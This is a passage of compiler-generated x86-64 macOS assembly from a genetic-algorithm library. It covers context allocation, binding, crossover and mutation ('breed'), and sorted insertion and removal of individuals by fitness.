mem[0],zero,zero,zero movss %xmm0, 120(%rax,%rcx,4) ## %bb.3: ## in Loop: Header=BB8_1 Depth=1 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB8_1 LBB8_4: movl -8(%rbp), %eax imull -12(%rbp), %eax cltq shlq $2, %rax movl %eax, %edi callq _lga_malloc movq %rax, %rcx movq _lga_ctx(%rip), %rax movq %rcx, (%rax) movslq -8(%rbp), %rax shlq $2, %rax movl %eax, %edi callq _lga_malloc movq %rax, %rcx movq _lga_ctx(%rip), %rax movq %rcx, 16(%rax) movslq -8(%rbp), %rax shlq $2, %rax movl %eax, %edi callq _lga_malloc movq %rax, %rcx movq _lga_ctx(%rip), %rax movq %rcx, 24(%rax) movslq -8(%rbp), %rax shlq $2, %rax movl %eax, %edi callq _lga_malloc movq %rax, %rcx movq _lga_ctx(%rip), %rax movq %rcx, 8(%rax) cmpq $0, _lga_ctx_arr(%rip) jne LBB8_6 ## %bb.5: movl -24(%rbp), %edi shll $12, %edi callq _lga_malloc movq %rax, _lga_ctx_arr(%rip) movq _lga_nctx@GOTPCREL(%rip), %rax movl $4096, (%rax) ## imm = 0x1000 LBB8_6: movl $0, -16(%rbp) LBB8_7: ## =>This Inner Loop Header: Depth=1 movl -16(%rbp), %eax movq _lga_nctx@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jge LBB8_12 ## %bb.8: ## in Loop: Header=BB8_7 Depth=1 movq _lga_ctx_arr(%rip), %rax movslq -16(%rbp), %rcx cmpq $0, (%rax,%rcx,8) jne LBB8_10 ## %bb.9: movq _lga_ctx(%rip), %rdx movq _lga_ctx_arr(%rip), %rax movslq -16(%rbp), %rcx movq %rdx, (%rax,%rcx,8) movl -16(%rbp), %eax movl %eax, -4(%rbp) jmp LBB8_13 LBB8_10: ## in Loop: Header=BB8_7 Depth=1 jmp LBB8_11 LBB8_11: ## in Loop: Header=BB8_7 Depth=1 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB8_7 LBB8_12: movq _lga_nctx@GOTPCREL(%rip), %rax movl (%rax), %eax movl %eax, -16(%rbp) movq _lga_nctx@GOTPCREL(%rip), %rax movl (%rax), %ecx sarl $1, %ecx movq _lga_nctx@GOTPCREL(%rip), %rax addl (%rax), %ecx movq _lga_nctx@GOTPCREL(%rip), %rax movl %ecx, (%rax) movq _lga_ctx_arr(%rip), %rdi movq _lga_nctx@GOTPCREL(%rip), %rax movl (%rax), %esi imull -24(%rbp), %esi callq _lga_realloc movq %rax, _lga_ctx_arr(%rip) movq _lga_ctx_arr(%rip), %rdi movslq -16(%rbp), %rax shlq $3, %rax addq %rax, %rdi movq _lga_nctx@GOTPCREL(%rip), %rax movl (%rax), %eax subl -16(%rbp), %eax imull -24(%rbp), %eax movslq %eax, %rdx xorl %esi, %esi movq $-1, %rcx callq ___memset_chk movq _lga_ctx(%rip), %rdx movq _lga_ctx_arr(%rip), %rax movslq -16(%rbp), %rcx movq %rdx, (%rax,%rcx,8) movl -16(%rbp), %eax movl %eax, -4(%rbp) LBB8_13: movl -4(%rbp), %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _lga_newctx_max ## -- Begin function lga_newctx_max .p2align 4, 0x90 _lga_newctx_max: ## @lga_newctx_max .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) movl %esi, -8(%rbp) movl -4(%rbp), %edi movl -8(%rbp), %esi callq _lga_newctx movl %eax, -12(%rbp) movq _lga_ctx(%rip), %rax movl $1, 48(%rax) movl -12(%rbp), %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _lga_bind ## -- Begin function lga_bind .p2align 4, 0x90 _lga_bind: ## @lga_bind .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -8(%rbp) cmpl $0, -8(%rbp) jl LBB10_2 ## %bb.1: movl -8(%rbp), %eax movq _lga_nctx@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jl LBB10_3 LBB10_2: movq $0, _lga_ctx(%rip) movl $-1, -4(%rbp) jmp LBB10_4 LBB10_3: movq _lga_ctx_arr(%rip), %rax movslq -8(%rbp), %rcx movq (%rax,%rcx,8), %rax movq %rax, _lga_ctx(%rip) movq _lga_ctx(%rip), %rdx movl $4294967295, %eax ## imm = 0xFFFFFFFF xorl %ecx, %ecx cmpq $0, %rdx cmovnel %ecx, %eax movl %eax, -4(%rbp) LBB10_4: movl -4(%rbp), %eax popq %rbp retq .cfi_endproc ## -- End function .globl _lga_lpc_swap ## -- Begin function lga_lpc_swap .p2align 4, 0x90 _lga_lpc_swap: ## @lga_lpc_swap .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movl %esi, -8(%rbp) movl -4(%rbp), %eax cmpl -8(%rbp), %eax jne LBB11_2 ## %bb.1: jmp LBB11_3 LBB11_2: movq _lga_ctx(%rip), %rax movq 16(%rax), %rax movslq -4(%rbp), %rcx movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero movss %xmm0, -20(%rbp) movq _lga_ctx(%rip), %rax movq 16(%rax), %rax movslq -8(%rbp), %rcx movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero movss %xmm0, -24(%rbp) movss -24(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movq 16(%rax), %rax movslq -4(%rbp), %rcx movss %xmm0, (%rax,%rcx,4) movss -20(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movq 16(%rax), %rax movslq -8(%rbp), %rcx movss %xmm0, (%rax,%rcx,4) movq _lga_ctx(%rip), %rax movq 24(%rax), %rax movslq -4(%rbp), %rcx movl (%rax,%rcx,4), %eax movl %eax, -12(%rbp) movq _lga_ctx(%rip), %rax movq 24(%rax), %rax movslq -8(%rbp), %rcx movl (%rax,%rcx,4), %eax movl %eax, -16(%rbp) movl -16(%rbp), %edx movq _lga_ctx(%rip), %rax movq 24(%rax), %rax movslq -4(%rbp), %rcx movl %edx, (%rax,%rcx,4) movl -12(%rbp), %edx movq _lga_ctx(%rip), %rax movq 24(%rax), %rax movslq -8(%rbp), %rcx movl %edx, (%rax,%rcx,4) LBB11_3: popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__literal8,8byte_literals .p2align 3 ## -- Begin function lga_breed_raw LCPI12_0: .quad 0x3fa999999999999a ## double 0.050000000000000003 LCPI12_1: .quad 0x3fb999999999999a ## double 0.10000000000000001 LCPI12_3: .quad 0x3ff8000000000000 ## double 1.5 .section __TEXT,__literal4,4byte_literals .p2align 2 LCPI12_2: .long 0x3f800000 ## float 1 .section __TEXT,__text,regular,pure_instructions .globl _lga_breed_raw .p2align 4, 0x90 _lga_breed_raw: ## @lga_breed_raw .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq %rdx, -24(%rbp) movl %ecx, -28(%rbp) movss %xmm0, -32(%rbp) movl $0, -44(%rbp) LBB12_1: ## =>This Inner Loop Header: Depth=1 movl -44(%rbp), %eax cmpl -28(%rbp), %eax jge LBB12_6 ## %bb.2: ## in Loop: Header=BB12_1 Depth=1 callq _lga_nfrand movss %xmm0, -36(%rbp) movq -8(%rbp), %rax movslq -44(%rbp), %rcx movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero movss LCPI12_2(%rip), %xmm2 ## xmm2 = mem[0],zero,zero,zero subss -36(%rbp), %xmm2 movq -16(%rbp), %rax movslq -44(%rbp), %rcx movss (%rax,%rcx,4), %xmm1 ## xmm1 = mem[0],zero,zero,zero mulss -36(%rbp), %xmm1 mulss %xmm2, %xmm0 addss %xmm1, %xmm0 movss %xmm0, -40(%rbp) callq _lga_ssqrrand cvtss2sd %xmm0, %xmm0 movsd LCPI12_1(%rip), %xmm1 ## xmm1 = mem[0],zero mulsd %xmm1, %xmm0 movss -32(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero cvtss2sd %xmm1, %xmm2 movss -40(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero cvtss2sd %xmm1, %xmm1 mulsd %xmm2, %xmm0 addsd %xmm1, %xmm0 cvtsd2ss %xmm0, %xmm0 movss %xmm0, -40(%rbp) callq _lga_nfrand movss %xmm0, -36(%rbp) movss -36(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm1 movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm2 movsd LCPI12_0(%rip), %xmm0 ## xmm0 = mem[0],zero mulsd %xmm2, %xmm0 ucomisd %xmm1, %xmm0 jbe LBB12_4 ## %bb.3: ## in Loop: Header=BB12_1 Depth=1 callq _lga_sfrand cvtss2sd %xmm0, %xmm0 movsd LCPI12_3(%rip), %xmm1 ## xmm1 = mem[0],zero mulsd %xmm1, %xmm0 cvtsd2ss %xmm0, %xmm0 callq _lga_ssqrt movss -32(%rbp), %xmm2 ## xmm2 = mem[0],zero,zero,zero movss LCPI12_2(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero subss -32(%rbp), %xmm1 mulss %xmm2, %xmm0 addss %xmm1, %xmm0 mulss -40(%rbp), %xmm0 movss %xmm0, -40(%rbp) LBB12_4: ## in Loop: Header=BB12_1 Depth=1 movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq -24(%rbp), %rax movslq -44(%rbp), %rcx movss %xmm0, (%rax,%rcx,4) ## %bb.5: ## in Loop: Header=BB12_1 Depth=1 movl -44(%rbp), %eax addl $1, %eax movl %eax, -44(%rbp) jmp LBB12_1 LBB12_6: addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _lga_remove_idx ## -- Begin function lga_remove_idx .p2align 4, 0x90 _lga_remove_idx: ## @lga_remove_idx .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movq _lga_ctx(%rip), %rax movq 8(%rax), %rax movslq -4(%rbp), %rcx movl (%rax,%rcx,4), %eax movl %eax, -12(%rbp) movq _lga_ctx(%rip), %rcx movl 36(%rcx), %eax addl $-1, %eax movl %eax, 36(%rcx) movl %eax, -8(%rbp) movl -12(%rbp), %eax movl %eax, -16(%rbp) LBB13_1: ## =>This Inner Loop Header: Depth=1 movl -16(%rbp), %eax cmpl -8(%rbp), %eax jge LBB13_4 ## %bb.2: ## in Loop: Header=BB13_1 Depth=1 movq _lga_ctx(%rip), %rax movq 16(%rax), %rax movl -16(%rbp), %ecx addl $1, %ecx movslq %ecx, %rcx movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movq 16(%rax), %rax movslq -16(%rbp), %rcx movss %xmm0, (%rax,%rcx,4) movq _lga_ctx(%rip), %rax movq 24(%rax), %rax movl -16(%rbp), %ecx addl $1, %ecx movslq %ecx, %rcx movl (%rax,%rcx,4), %eax movl %eax, -20(%rbp) movl -20(%rbp), %edx movq _lga_ctx(%rip), %rax movq 24(%rax), %rax movslq -16(%rbp), %rcx movl %edx, (%rax,%rcx,4) movl -16(%rbp), %edx movq _lga_ctx(%rip), %rax movq 8(%rax), %rax movslq -20(%rbp), %rcx movl %edx, (%rax,%rcx,4) ## %bb.3: ## in Loop: Header=BB13_1 Depth=1 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB13_1 LBB13_4: popq %rbp retq .cfi_endproc ## -- End function .globl _lga_insert_idx_min ## -- Begin function lga_insert_idx_min .p2align 4, 0x90 _lga_insert_idx_min: ## @lga_insert_idx_min .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movss %xmm0, -4(%rbp) movl %edi, -8(%rbp) movl $0, -16(%rbp) movq _lga_ctx(%rip), %rax movl 36(%rax), %eax sarl $1, %eax movl %eax, -20(%rbp) LBB14_1: ## =>This Inner Loop Header: Depth=1 cmpl $0, -20(%rbp) je LBB14_5 ## %bb.2: ## in Loop: Header=BB14_1 Depth=1 movss -4(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movq 16(%rax), %rax movl -16(%rbp), %ecx addl -20(%rbp), %ecx movslq %ecx, %rcx ucomiss (%rax,%rcx,4), %xmm0 jbe LBB14_4 ## %bb.3: ## in Loop: Header=BB14_1 Depth=1 movl -20(%rbp), %eax addl -16(%rbp), %eax movl %eax, -16(%rbp) LBB14_4: ## in Loop: Header=BB14_1 Depth=1 movl -20(%rbp), %eax sarl $1, %eax movl %eax, -20(%rbp) jmp LBB14_1 LBB14_5: jmp LBB14_6 LBB14_6: ## =>This Inner Loop Header: Depth=1 movl -16(%rbp), %eax movq _lga_ctx(%rip), %rcx cmpl 36(%rcx), %eax jge LBB14_11 ## %bb.7: ## in Loop: Header=BB14_6 Depth=1 movss -4(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movq 16(%rax), %rax movslq -16(%rbp), %rcx movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero ucomiss %xmm1, %xmm0 jb LBB14_9 ## %bb.8: jmp LBB14_11 LBB14_9: ## in Loop: Header=BB14_6 Depth=1 jmp LBB14_10 LBB14_10: ## in Loop: Header=BB14_6 Depth=1 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB14_6 LBB14_11: movq _lga_ctx(%rip), %rcx movl 36(%rcx), %eax movl %eax, %edx addl $1, %edx movl %edx, 36(%rcx) movl %eax, -12(%rbp) movl -12(%rbp), %eax movl %eax, -20(%rbp) LBB14_12: ## =>This Inner Loop Header: Depth=1 movl -20(%rbp), %eax cmpl -16(%rbp), %eax jle LBB14_15 ## %bb.13: ## in Loop: Header=BB14_12 Depth=1 movq _lga_ctx(%rip), %rax movq 16(%rax), %rax movl -20(%rbp), %ecx subl $1, %ecx movslq %ecx, %rcx movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movq 16(%rax), %rax movslq -20(%rbp), %rcx movss %xmm0, (%rax,%rcx,4) movq _lga_ctx(%rip), %rax movq 24(%rax), %rax movl -20(%rbp), %ecx subl $1, %ecx movslq %ecx, %rcx movl (%rax,%rcx,4), %eax movl %eax, -24(%rbp) movl -24(%rbp), %edx movq _lga_ctx(%rip), %rax movq 24(%rax), %rax movslq -20(%rbp), %rcx movl %edx, (%rax,%rcx,4) movl -20(%rbp), %edx movq _lga_ctx(%rip), %rax movq 8(%rax), %rax movslq -24(%rbp), %rcx movl %edx, (%rax,%rcx,4) ## %bb.14: ## in Loop: Header=BB14_12 Depth=1 movl -20(%rbp), %eax addl $-1, %eax movl %eax, -20(%rbp) jmp LBB14_12 LBB14_15: movss -4(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movq 16(%rax), %rax movslq -16(%rbp), %rcx movss %xmm0, (%rax,%rcx,4) movl -8(%rbp), %edx movq _lga_ctx(%rip), %rax movq 24(%rax), %rax movslq -16(%rbp), %rcx movl %edx, (%rax,%rcx,4) movl -16(%rbp), %edx movq _lga_ctx(%rip), %rax movq 8(%rax), %rax movslq -8(%rbp), %rcx movl %edx, (%rax,%rcx,4) callq _rand andl $15, %eax movl %eax, -16(%rbp) movl -16(%rbp), %eax movl %eax, -20(%rbp) LBB14_16: ## =>This Inner Loop Header: Depth=1 cmpl $15, -20(%rbp) jge LBB14_19 ## %bb.17: ## in Loop: Header=BB14_16 Depth=1 movq _lga_ctx(%rip), %rax movl -20(%rbp), %ecx addl $1, %ecx movslq %ecx, %rcx movss 56(%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movslq -20(%rbp), %rcx movss %xmm0, 56(%rax,%rcx,4) movq _lga_ctx(%rip), %rax movl -20(%rbp), %ecx addl $1, %ecx movslq %ecx, %rcx movss 120(%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movslq -20(%rbp), %rcx movss %xmm0, 120(%rax,%rcx,4) ## %bb.18: ## in Loop: Header=BB14_16 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB14_16 LBB14_19: movl $0, -16(%rbp) LBB14_20: ## =>This Inner Loop Header: Depth=1 cmpl $15, -16(%rbp) jge LBB14_25 ## %bb.21: ## in Loop: Header=BB14_20 Depth=1 movss -4(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movslq -16(%rbp), %rcx movss 56(%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero ucomiss %xmm1, %xmm0 jb LBB14_23 ## %bb.22: jmp LBB14_25 LBB14_23: ## in Loop: Header=BB14_20 Depth=1 jmp LBB14_24 LBB14_24: ## in Loop: Header=BB14_20 Depth=1 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB14_20 LBB14_25: movl $15, -20(%rbp) LBB14_26: ## =>This Inner Loop Header: Depth=1 movl -20(%rbp), %eax cmpl -16(%rbp), %eax jle LBB14_29 ## %bb.27: ## in Loop: Header=BB14_26 Depth=1 movq _lga_ctx(%rip), %rax movl -20(%rbp), %ecx subl $1, %ecx movslq %ecx, %rcx movss 56(%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movslq -20(%rbp), %rcx movss %xmm0, 56(%rax,%rcx,4) movq _lga_ctx(%rip), %rax movl -20(%rbp), %ecx subl $1, %ecx movslq %ecx, %rcx movss 120(%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movslq -20(%rbp), %rcx movss %xmm0, 120(%rax,%rcx,4) ## %bb.28: ## in Loop: Header=BB14_26 Depth=1 movl -20(%rbp), %eax addl $-1, %eax movl %eax, -20(%rbp) jmp LBB14_26 LBB14_29: movss -4(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movslq -16(%rbp), %rcx movss %xmm0, 56(%rax,%rcx,4) movq _lga_ctx(%rip), %rax movss 52(%rax), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movslq -16(%rbp), %rcx movss %xmm0, 120(%rax,%rcx,4) addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _lga_insert_idx_max ## -- Begin function lga_insert_idx_max .p2align 4, 0x90 _lga_insert_idx_max: ## @lga_insert_idx_max .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movss %xmm0, -4(%rbp) movl %edi, -8(%rbp) movl $0, -16(%rbp) movq _lga_ctx(%rip), %rax movl 36(%rax), %eax sarl $1, %eax movl %eax, -20(%rbp) LBB15_1: ## =>This Inner Loop Header: Depth=1 cmpl $0, -20(%rbp) je LBB15_5 ## %bb.2: ## in Loop: Header=BB15_1 Depth=1 movss -4(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movq 16(%rax), %rax movl -16(%rbp), %ecx addl -20(%rbp), %ecx movslq %ecx, %rcx movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero ucomiss %xmm1, %xmm0 jbe LBB15_4 ## %bb.3: ## in Loop: Header=BB15_1 Depth=1 movl -20(%rbp), %eax addl -16(%rbp), %eax movl %eax, -16(%rbp) LBB15_4: ## in Loop: Header=BB15_1 Depth=1 movl -20(%rbp), %eax sarl $1, %eax movl %eax, -20(%rbp) jmp LBB15_1 LBB15_5: jmp LBB15_6 LBB15_6: ## =>This Inner Loop Header: Depth=1 movl -16(%rbp), %eax movq _lga_ctx(%rip), %rcx cmpl 36(%rcx), %eax jge LBB15_11 ## %bb.7: ## in Loop: Header=BB15_6 Depth=1 movss -4(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movq 16(%rax), %rax movslq -16(%rbp), %rcx ucomiss (%rax,%rcx,4), %xmm0 jb LBB15_9 ## %bb.8: jmp LBB15_11 LBB15_9: ## in Loop: Header=BB15_6 Depth=1 jmp LBB15_10 LBB15_10: ## in Loop: Header=BB15_6 Depth=1 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB15_6 LBB15_11: movq _lga_ctx(%rip), %rcx movl 36(%rcx), %eax movl %eax, %edx addl $1, %edx movl %edx, 36(%rcx) movl %eax, -12(%rbp) movl -12(%rbp), %eax movl %eax, -20(%rbp) LBB15_12: ## =>This Inner Loop Header: Depth=1 movl -20(%rbp), %eax cmpl -16(%rbp), %eax jle LBB15_15 ## %bb.13: ## in Loop: Header=BB15_12 Depth=1 movq _lga_ctx(%rip), %rax movq 16(%rax), %rax movl -20(%rbp), %ecx subl $1, %ecx movslq %ecx, %rcx movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movq 16(%rax), %rax movslq -20(%rbp), %rcx movss %xmm0, (%rax,%rcx,4) movq _lga_ctx(%rip), %rax movq 24(%rax), %rax movl -20(%rbp), %ecx subl $1, %ecx movslq %ecx, %rcx movl (%rax,%rcx,4), %eax movl %eax, -24(%rbp) movl -24(%rbp), %edx movq _lga_ctx(%rip), %rax movq 24(%rax), %rax movslq -20(%rbp), %rcx movl %edx, (%rax,%rcx,4) movl -20(%rbp), %edx movq _lga_ctx(%rip), %rax movq 8(%rax), %rax movslq -24(%rbp), %rcx movl %edx, (%rax,%rcx,4) ## %bb.14: ## in Loop: Header=BB15_12 Depth=1 movl -20(%rbp), %eax addl $-1, %eax movl %eax, -20(%rbp) jmp LBB15_12 LBB15_15: movss -4(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movq 16(%rax), %rax movslq -16(%rbp), %rcx movss %xmm0, (%rax,%rcx,4) movl -8(%rbp), %edx movq _lga_ctx(%rip), %rax movq 24(%rax), %rax movslq -16(%rbp), %rcx movl %edx, (%rax,%rcx,4) movl -16(%rbp), %edx movq _lga_ctx(%rip), %rax movq 8(%rax), %rax movslq -8(%rbp), %rcx movl %edx, (%rax,%rcx,4) callq _rand andl $15, %eax movl %eax, -16(%rbp) movl -16(%rbp), %eax movl %eax, -20(%rbp) LBB15_16: ## =>This Inner Loop Header: Depth=1 cmpl $15, -20(%rbp) jge LBB15_19 ## %bb.17: ## in Loop: Header=BB15_16 Depth=1 movq _lga_ctx(%rip), %rax movl -20(%rbp), %ecx addl $1, %ecx movslq %ecx, %rcx movss 56(%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movslq -20(%rbp), %rcx movss %xmm0, 56(%rax,%rcx,4) movq _lga_ctx(%rip), %rax movl -20(%rbp), %ecx addl $1, %ecx movslq %ecx, %rcx movss 120(%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movslq -20(%rbp), %rcx movss %xmm0, 120(%rax,%rcx,4) ## %bb.18: ## in Loop: Header=BB15_16 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB15_16 LBB15_19: movl $0, -16(%rbp) LBB15_20: ## =>This Inner Loop Header: Depth=1 cmpl $15, -16(%rbp) jge LBB15_25 ## %bb.21: ## in Loop: Header=BB15_20 Depth=1 movss -4(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movslq -16(%rbp), %rcx ucomiss 56(%rax,%rcx,4), %xmm0 jb LBB15_23 ## %bb.22: jmp LBB15_25 LBB15_23: ## in Loop: Header=BB15_20 Depth=1 jmp LBB15_24 LBB15_24: ## in Loop: Header=BB15_20 Depth=1 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB15_20 LBB15_25: movl $15, -20(%rbp) LBB15_26: ## =>This Inner Loop Header: Depth=1 movl -20(%rbp), %eax cmpl -16(%rbp), %eax jle LBB15_29 ## %bb.27: ## in Loop: Header=BB15_26 Depth=1 movq _lga_ctx(%rip), %rax movl -20(%rbp), %ecx subl $1, %ecx movslq %ecx, %rcx movss 56(%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movslq -20(%rbp), %rcx movss %xmm0, 56(%rax,%rcx,4) movq _lga_ctx(%rip), %rax movl -20(%rbp), %ecx subl $1, %ecx movslq %ecx, %rcx movss 120(%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movslq -20(%rbp), %rcx movss %xmm0, 120(%rax,%rcx,4) ## %bb.28: ## in Loop: Header=BB15_26 Depth=1 movl -20(%rbp), %eax addl $-1, %eax movl %eax, -20(%rbp) jmp LBB15_26 LBB15_29: movss -4(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movslq -16(%rbp), %rcx movss %xmm0, 56(%rax,%rcx,4) movq _lga_ctx(%rip), %rax movss 52(%rax), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movslq -16(%rbp), %rcx movss %xmm0, 120(%rax,%rcx,4) addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _lga_insert ## -- Begin function lga_insert .p2align 4, 0x90 _lga_insert: ## @lga_insert .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movss %xmm0, -12(%rbp) movq _lga_ctx(%rip), %rax movl 32(%rax), %eax movl %eax, -16(%rbp) movq _lga_ctx(%rip), %rax movl 32(%rax), %eax addl $1, %eax movq _lga_ctx(%rip), %rcx cltd idivl 44(%rcx) movq _lga_ctx(%rip), %rax movl %edx, 32(%rax) movq _lga_ctx(%rip), %rax movl 36(%rax), %eax movq _lga_ctx(%rip), %rcx cmpl 44(%rcx), %eax jl LBB16_2 ## %bb.1: movl -16(%rbp), %edi callq _lga_remove_idx LBB16_2: movl $0, -20(%rbp) LBB16_3: ## =>This Inner Loop Header: Depth=1 movl -20(%rbp), %eax movq _lga_ctx(%rip), %rcx cmpl 40(%rcx), %eax jge LBB16_6 ## %bb.4: ## in Loop: Header=BB16_3 Depth=1 movq -8(%rbp), %rax movslq -20(%rbp), %rcx movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movq (%rax), %rax movl -16(%rbp), %ecx movq _lga_ctx(%rip), %rdx imull 40(%rdx), %ecx addl -20(%rbp), %ecx movslq %ecx, %rcx movss %xmm0, (%rax,%rcx,4) ## %bb.5: ## in Loop: Header=BB16_3 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB16_3 LBB16_6: movq _lga_ctx(%rip), %rax cmpl $0, 48(%rax) je LBB16_8 ## %bb.7: movss -12(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero movl -16(%rbp), %edi callq _lga_insert_idx_max jmp LBB16_9 LBB16_8: movss -12(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero movl -16(%rbp), %edi callq _lga_insert_idx_min LBB16_9: addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__literal4,4byte_literals .p2align 2 ## -- Begin function lga_populate LCPI17_0: .long 0x5368d4a5 ## float 9.99999995E+11 LCPI17_1: .long 0xd368d4a5 ## float -9.99999995E+11 .section __TEXT,__text,regular,pure_instructions .globl _lga_populate .p2align 4, 0x90 _lga_populate: ## @lga_populate .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movss %xmm0, -4(%rbp) movq _lga_ctx(%rip), %rax cmpl $0, 48(%rax) je LBB17_2 ## %bb.1: movss LCPI17_1(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero movss %xmm0, -20(%rbp) jmp LBB17_3 LBB17_2: movss LCPI17_0(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero movss %xmm0, -20(%rbp) LBB17_3: jmp LBB17_4 LBB17_4: ## =>This Loop Header: Depth=1 ## Child Loop BB17_6 Depth 2 movq _lga_ctx(%rip), %rax movl 36(%rax), %eax movq _lga_ctx(%rip), %rcx cmpl 44(%rcx), %eax jge LBB17_10 ## %bb.5: ## in Loop: Header=BB17_4 Depth=1 movq _lga_ctx(%rip), %rax movl 32(%rax), %eax movl %eax, -12(%rbp) movq _lga_ctx(%rip), %rax movl 32(%rax), %eax addl $1, %eax movq 